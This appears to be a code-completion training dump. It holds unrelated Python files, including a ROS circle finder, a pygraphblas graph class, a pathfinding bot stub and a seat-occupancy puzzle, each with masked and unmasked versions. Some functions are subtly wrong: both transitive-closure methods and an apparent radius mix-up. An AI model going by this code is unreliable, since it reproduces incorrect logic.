*\n\n\n#-------------------------------------------------------------------------------\n# Function: callback\n#\n# Thread created when a laser scan is received on a listening topic and extract \n# and publish a specified number of circle from the data.\n#\n#-------------------------------------------------------------------------------\n#\n# args - An array of arguments. The form is: \n# max_dist - the maximum distance to look for circles. If a sample or \n# circle edge goes beyond this then it will be ignored.\n# max_rad - The maximum radius that a valid circle can have.\n# min_rad - The minimum radius that a valid circle can have.\n# grad_tol - The tolerance used in the prune function.\n# split_multi - The multiplier used in the split function\n#\n# publish - A circleArray object containing the circle data in an array of \n# circleEntry objects. These classes are defined in the \n# circleFinder/msg path.\n#-------------------------------------------------------------------------------\ndef callback(data, args):\n tStart = time.time()\n \n pub = args[0]\n max_dist = args[1]\n max_rad = args[2]\n min_rad = args[3]\n grad_tol = args[4]\n split_multi = args[5]\n prune_lines = args[6]\n plot = args[7]\n \n \n # Get possible circle data.\n possibles = dataParser(data,max_dist, grad_tol, split_multi, prune_lines)\n \n # Calculate the circle info from that data.\n circles = []\n for i in possibles:\n current = matchCirc(list(i), False)\n if current is not None:\n #prune out any circles that are too large or small\n if current[1] > max_rad or \\\n current[1] < min_rad or \\\n math.sqrt(math.pow(current[0][0],2) + math.pow(current[0][1],2)) + current[1] > max_dist:\n pass\n else:\n circles.append(current)\n \n # Setup circleArray and publish found circles.\n ret = []\n for i in circles:\n c = circleEntry()\n c.x = i[0][0]\n c.y = i[0][1]\n c.distance = math.sqrt(i[0][0]*i[0][0] + i[0][1] * i[0][1])\n c.theta = math.atan2(i[0][1], i[0][0])\n c.radius = i[1]\n ret.append(c)\n m = circleArray()\n m.broadcastTime = rospy.get_rostime()\n m.duration = time.time() - tStart\n m.array = ret\n if not rospy.is_shutdown():\n pub.publish(m)\n \n if plot:\n import matplotlib.pyplot as plt\n plotWorld(data, 30, True, 'ro')\n for i in circles:\n plotCircle((i[0])[0],(i[0])[1],i[1])\n for i in possibles:\n for u in i:\n plt.plot(u[0], u[1], 'bo')\n plt.plot(0,0,'ro')\n plotAxis(8,-8,8,-8,4)\n plt.axis([-8,8,-8,8])\n plt.show()\n\n\n\n#-------------------------------------------------------------------------------\n# Function: main\n#\n# Sets up the callback function and then idles.\n#\n# Program arguments are inside. \n#\n#-------------------------------------------------------------------------------\nif __name__ == '__main__':\n #print dir()\n \n # the publiser\n pub = rospy.Publisher(\"circles\", circleArray)\n \n # The maximum distance from the origin that a sample point or circle edge \n # can be before they are considered invalid.\n max_dist = 7\n \n # The maximum radius a circle can be before it is considered invalid.\n max_rad = 0.25\n \n # The maximum radius a circle can be before it is considered invalid.\n min_rad = 0\n \n # See the prune function in data_parser.py\n grad_tol = 0.3\n \n # See the split function in data_parser.py\n split_multi = 2.5\n \n # If true then an attempt to remove straight edges from the data will be \n # made.\n prune_lines = True\n \n # Plot flag.\n plot = False\n \n import sys\n if (len(sys.argv) > 1):\n for i in sys.argv:\n if i == '--plot':\n plot = True\n elif i == '--no-line-pruning':\n prune_lines = False\n \n args = [pub, max_dist, max_rad, min_rad, grad_tol, split_multi, prune_lines , plot]\n print \"--------------------------------------------------------------------------------\"\n print \"Circle Finder\"\n print\n print \"--------------------------------------------------------------------------------\"\n print \"Command line arguments are:\"\n print \" --plot Will cause the outcome of the first scan to be plotted.\"\n print \" --no-line-pruning Will prevent straight lines from being removed from the\" \n print \" scan.\"\n print\n print \"--------------------------------------------------------------------------------\"\n print \"Starting circle finder with arguments:\"\n print\n print \" Publisher: \" , pub\n print \" Maximum Distance: \" , max_dist\n print \" Maximum Radius: \" , max_rad\n print \" Minimum Radius: \" , min_rad\n print \" Gradient Tolerance: \" , grad_tol\n print \" Split Multiplier: \" , split_multi\n print \" Remove Lines: \" , prune_lines \n print \" Plot: \" , plot\n print\n print \"--------------------------------------------------------------------------------\"\n print \"To increase speed, the listening thread is not verbose.\"\n print \"Ctrl+C to exit.\"\n rospy.init_node('circles', anonymous=True)\n rospy.Subscriber(\"base_scan\",LaserScan, callback, callback_args=args)\n rospy.Subscriber(\"scan\",LaserScan, callback, callback_args=args)\n rospy.spin()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Graph:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
if old == adj_matrix:
break
return adj_matrix
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
<|reserved_special_token_0|>
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
if old == adj_matrix:
break
return adj_matrix
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def __init__(self):
self.n_vertices = 0
self.label_matrices = dict()
self.start_vertices = set()
self.final_vertices = set()
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
if old == adj_matrix:
break
return adj_matrix
def transitive_closure_2(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = result.nvals
result += adj_matrix
if old == result.nvals:
break
return result
def labels(self):
return self.label_matrices.keys()
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
<|reserved_special_token_1|>
from pygraphblas.matrix import Matrix
from pygraphblas.types import BOOL
from pyformlang.regular_expression import Regex
class Graph:
def __init__(self):
self.n_vertices = 0
self.label_matrices = dict()
self.start_vertices = set()
self.final_vertices = set()
def from_trans(self, filename):
input_file = open(filename)
edges = input_file.read().rstrip().split('\n')
input_file.close()
max_vertice_number = 0
for edge in edges:
fro, label, to = edge.split(' ')
max_vertice_number = max(max_vertice_number, int(fro))
max_vertice_number = max(max_vertice_number, int(to))
self.n_vertices = max_vertice_number + 1
for edge in edges:
fro, label, to = edge.split(' ')
self.get_by_label(label)[int(fro), int(to)] = True
def from_regex(self, filename):
input_file = open(filename)
regex = Regex(input_file.read().rstrip())
dfa = regex.to_epsilon_nfa().to_deterministic().minimize()
self.n_vertices = len(dfa.states)
state_renumeration = dict()
i = 0
for state in dfa.states:
state_renumeration[state] = i
i += 1
for fro, label, to in dfa._transition_function.get_edges():
self.get_by_label(str(label))[state_renumeration[fro],
state_renumeration[to]] = True
self.start_vertices.add(state_renumeration[dfa.start_state])
for state in dfa.final_states:
self.final_vertices.add(state_renumeration[state])
def transitive_closure_1(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = adj_matrix.nvals
adj_matrix += adj_matrix @ adj_matrix
if old == adj_matrix:
break
return adj_matrix
def transitive_closure_2(self):
adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)
for label_matrix in self.label_matrices.values():
adj_matrix += label_matrix
if adj_matrix.nvals != 0:
while True:
old = result.nvals
result += adj_matrix
if old == result.nvals:
break
return result
def labels(self):
return self.label_matrices.keys()
def get_by_label(self, label):
if label not in self.label_matrices.keys():
self.label_matrices[label] = Matrix.sparse(BOOL, self.
n_vertices, self.n_vertices)
return self.label_matrices[label]
|
flexible
|
{
"blob_id": "2ccc3bb63445572610f6dbdfe5b1cbeef506c9a9",
"index": 8613,
"step-1": "<mask token>\n\n\nclass Graph:\n <mask token>\n <mask token>\n <mask token>\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n <mask token>\n <mask token>\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-2": "<mask token>\n\n\nclass Graph:\n <mask token>\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n <mask token>\n <mask token>\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-3": "<mask token>\n\n\nclass Graph:\n\n def __init__(self):\n self.n_vertices = 0\n self.label_matrices = dict()\n self.start_vertices = set()\n self.final_vertices = set()\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n\n def transitive_closure_2(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = result.nvals\n result += adj_matrix\n if old == result.nvals:\n break\n return result\n\n def labels(self):\n return self.label_matrices.keys()\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-4": "from pygraphblas.matrix import Matrix\nfrom pygraphblas.types import BOOL\nfrom pyformlang.regular_expression import Regex\n\n\nclass Graph:\n\n def __init__(self):\n self.n_vertices = 0\n self.label_matrices = dict()\n self.start_vertices = set()\n self.final_vertices = set()\n\n def from_trans(self, filename):\n input_file = open(filename)\n edges = input_file.read().rstrip().split('\\n')\n input_file.close()\n max_vertice_number = 0\n for edge in edges:\n fro, label, to = edge.split(' ')\n max_vertice_number = max(max_vertice_number, int(fro))\n max_vertice_number = max(max_vertice_number, int(to))\n self.n_vertices = max_vertice_number + 1\n for edge in edges:\n fro, label, to = edge.split(' ')\n self.get_by_label(label)[int(fro), int(to)] = True\n\n def from_regex(self, filename):\n input_file = open(filename)\n regex = Regex(input_file.read().rstrip())\n dfa = regex.to_epsilon_nfa().to_deterministic().minimize()\n self.n_vertices = len(dfa.states)\n state_renumeration = dict()\n i = 0\n for state in dfa.states:\n state_renumeration[state] = i\n i += 1\n for fro, label, to in dfa._transition_function.get_edges():\n self.get_by_label(str(label))[state_renumeration[fro],\n state_renumeration[to]] = True\n self.start_vertices.add(state_renumeration[dfa.start_state])\n for state in dfa.final_states:\n self.final_vertices.add(state_renumeration[state])\n\n def transitive_closure_1(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = adj_matrix.nvals\n adj_matrix += adj_matrix @ adj_matrix\n if old == adj_matrix:\n break\n return adj_matrix\n\n def transitive_closure_2(self):\n adj_matrix = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n result = Matrix.sparse(BOOL, self.n_vertices, self.n_vertices)\n for label_matrix in self.label_matrices.values():\n adj_matrix += label_matrix\n if adj_matrix.nvals != 0:\n while True:\n old = result.nvals\n result += adj_matrix\n if old == result.nvals:\n break\n return result\n\n def labels(self):\n return self.label_matrices.keys()\n\n def get_by_label(self, label):\n if label not in self.label_matrices.keys():\n self.label_matrices[label] = Matrix.sparse(BOOL, self.\n n_vertices, self.n_vertices)\n return self.label_matrices[label]\n",
"step-5": null,
"step-ids": [
3,
5,
8,
9
]
}
|
[
3,
5,
8,
9
] |
# -*- coding: utf-8 -*-
class Bot(dict):
def __init__(self):
self["getRayon"] = 0
self["getPosition"] = (-1000, -1000)
self.traj = []
def getTrajectoires(self):
return self.traj
def getRayon(self):
return self["getRayon"]
def getPosition(self):
return self["getPosition"]
if __name__ == "__main__":
import sys
import os
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(FILE_DIR, "../../ia"))
sys.path.append(os.path.join(FILE_DIR, "../../libs"))
import time
from graphview import GraphView
from event.goals import navigation
from event import collision
filename = os.path.join(FILE_DIR, "../../ia/event/goals/navigation/map.xml")
try:
offset = sys.argv[1]
except:
offset = 0
start = time.time()
other_bot = Bot()
other_bot.name = 'other'
other_bot["getRayon"] = 200
used_bot = Bot()
used_bot.name = 'used'
used_bot["getRayon"] = 120
ennemy1 = Bot()
ennemy1.name = 'en1'
ennemy2 = Bot()
ennemy2.name = 'en2'
ennemy1["getPosition"] = (1800, 1500)
ennemy1["getRayon"] = 200
ennemy2["getPosition"] = (2200, 500)
ennemy1["getRayon"] = 120
ng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2], filename)
col = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])
print("init time : %s" % (time.time() - start))
v = GraphView(ng, col, other_bot, used_bot)
v.mainloop()
|
normal
|
{
"blob_id": "d178818faf5fb18f5da48c1e2cf7991600731d06",
"index": 4457,
"step-1": "class Bot(dict):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n\n def getPosition(self):\n return self['getPosition']\n\n\n<mask token>\n",
"step-4": "class Bot(dict):\n\n def __init__(self):\n self['getRayon'] = 0\n self['getPosition'] = -1000, -1000\n self.traj = []\n\n def getTrajectoires(self):\n return self.traj\n\n def getRayon(self):\n return self['getRayon']\n\n def getPosition(self):\n return self['getPosition']\n\n\nif __name__ == '__main__':\n import sys\n import os\n FILE_DIR = os.path.dirname(os.path.abspath(__file__))\n sys.path.append(os.path.join(FILE_DIR, '../../ia'))\n sys.path.append(os.path.join(FILE_DIR, '../../libs'))\n import time\n from graphview import GraphView\n from event.goals import navigation\n from event import collision\n filename = os.path.join(FILE_DIR, '../../ia/event/goals/navigation/map.xml'\n )\n try:\n offset = sys.argv[1]\n except:\n offset = 0\n start = time.time()\n other_bot = Bot()\n other_bot.name = 'other'\n other_bot['getRayon'] = 200\n used_bot = Bot()\n used_bot.name = 'used'\n used_bot['getRayon'] = 120\n ennemy1 = Bot()\n ennemy1.name = 'en1'\n ennemy2 = Bot()\n ennemy2.name = 'en2'\n ennemy1['getPosition'] = 1800, 1500\n ennemy1['getRayon'] = 200\n ennemy2['getPosition'] = 2200, 500\n ennemy1['getRayon'] = 120\n ng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2],\n filename)\n col = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])\n print('init time : %s' % (time.time() - start))\n v = GraphView(ng, col, other_bot, used_bot)\n v.mainloop()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\nclass Bot(dict):\n\tdef __init__(self):\n\t\tself[\"getRayon\"] = 0\n\t\tself[\"getPosition\"] = (-1000, -1000)\n\t\tself.traj = []\n\tdef getTrajectoires(self):\n\t\treturn self.traj\n\tdef getRayon(self):\n\t\treturn self[\"getRayon\"]\n\tdef getPosition(self):\n\t\treturn self[\"getPosition\"]\n\nif __name__ == \"__main__\":\n\timport sys\n\timport os\n\tFILE_DIR = os.path.dirname(os.path.abspath(__file__))\n\tsys.path.append(os.path.join(FILE_DIR, \"../../ia\"))\n\tsys.path.append(os.path.join(FILE_DIR, \"../../libs\"))\n\t\n\timport time\n\t\n\tfrom graphview import GraphView\n\tfrom event.goals import navigation\n\tfrom event import collision\n\t\n\tfilename = os.path.join(FILE_DIR, \"../../ia/event/goals/navigation/map.xml\")\n\ttry:\n\t\toffset = sys.argv[1]\n\texcept:\n\t\toffset = 0\n\tstart = time.time()\n\tother_bot = Bot()\n\tother_bot.name = 'other'\n\tother_bot[\"getRayon\"] = 200\n\tused_bot = Bot()\n\tused_bot.name = 'used'\n\tused_bot[\"getRayon\"] = 120\n\tennemy1 = Bot()\n\tennemy1.name = 'en1'\n\tennemy2 = Bot()\n\tennemy2.name = 'en2'\n\tennemy1[\"getPosition\"] = (1800, 1500)\n\tennemy1[\"getRayon\"] = 200\n\tennemy2[\"getPosition\"] = (2200, 500)\n\tennemy1[\"getRayon\"] = 120\n\tng = navigation.PathFinding([used_bot, other_bot, ennemy1, ennemy2], filename)\n\tcol = collision.Collision([used_bot, other_bot, ennemy1, ennemy2])\n\tprint(\"init time : %s\" % (time.time() - start))\n\t\n\tv = GraphView(ng, col, other_bot, used_bot)\n\tv.mainloop()\n\n",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
import sys
def show_data(data):
for line in data:
print(''.join(line))
print("")
def check_seat(data, i, j):
if data[i][j] == '#':
occupied = 1
found = True
elif data[i][j] == 'L':
occupied = 0
found = True
else:
occupied = 0
found = False
return occupied, found
def is_top_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
j -= 1
return occupied
def is_top_occupied(data,i,j):
found = False
occupied = 0
while (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
j -= 1
return occupied
def is_top_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (j >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
j -= 1
return occupied
def is_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
return occupied
def is_bottom_right_occupied(data,i,j):
found = False
occupied = 0
while (i < len(data)) and (j < len(data[i])) and (not found):
occupied, found = check_seat(data, i, j)
i += 1
j += 1
return occupied
def is_bottom_occupied(data,i,j):
found = False
occupied = 0
while (j < len(data[0])) and (not found):
occupied, found = check_seat(data, i, j)
j += 1
return occupied
def is_bottom_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (j < len(data[i])) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
j += 1
return occupied
def is_left_occupied(data,i,j):
found = False
occupied = 0
while (i >= 0) and (not found):
occupied, found = check_seat(data, i, j)
i -= 1
return occupied
def get_occupied_seats(data,i,j):
occupied_seats = ( is_top_left_occupied(data, i-1, j-1) +
is_top_occupied(data, i, j-1) +
is_top_right_occupied(data, i+1, j-1) +
is_right_occupied(data, i+1, j) +
is_bottom_right_occupied(data, i+1, j+1) +
is_bottom_occupied(data, i, j+1) +
is_bottom_left_occupied(data, i-1, j+1) +
is_left_occupied(data, i-1, j) )
# print(occupied_seats)
return occupied_seats
def count_seats(data):
seats = 0
for line in data:
for x in line:
if x == "#": seats += 1
return seats
def main():
with open('input.txt') as f:
lines = f.readlines()
data = [[char for char in line[:-1]] for line in lines]
data_next = [['.' for char in line[:-1]] for line in lines]
end = False
round = 1
while not end:
for i in range(0,len(data)):
for j in range(0,len(data[i])):
if (data[i][j] == 'L') and (get_occupied_seats(data,i,j) == 0):
data_next[i][j] = '#'
elif (data[i][j] == '#') and (get_occupied_seats(data,i,j) >= 5):
data_next[i][j] = 'L'
print ("Round %d" % round)
round += 1
if data == data_next:
seats = count_seats(data)
print(seats)
end = True
else:
data = [x[:] for x in data_next]
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "246ec0d6833c9292487cb4d381d2ae82b220677e",
"index": 3969,
"step-1": "<mask token>\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\n<mask token>\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef is_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n return 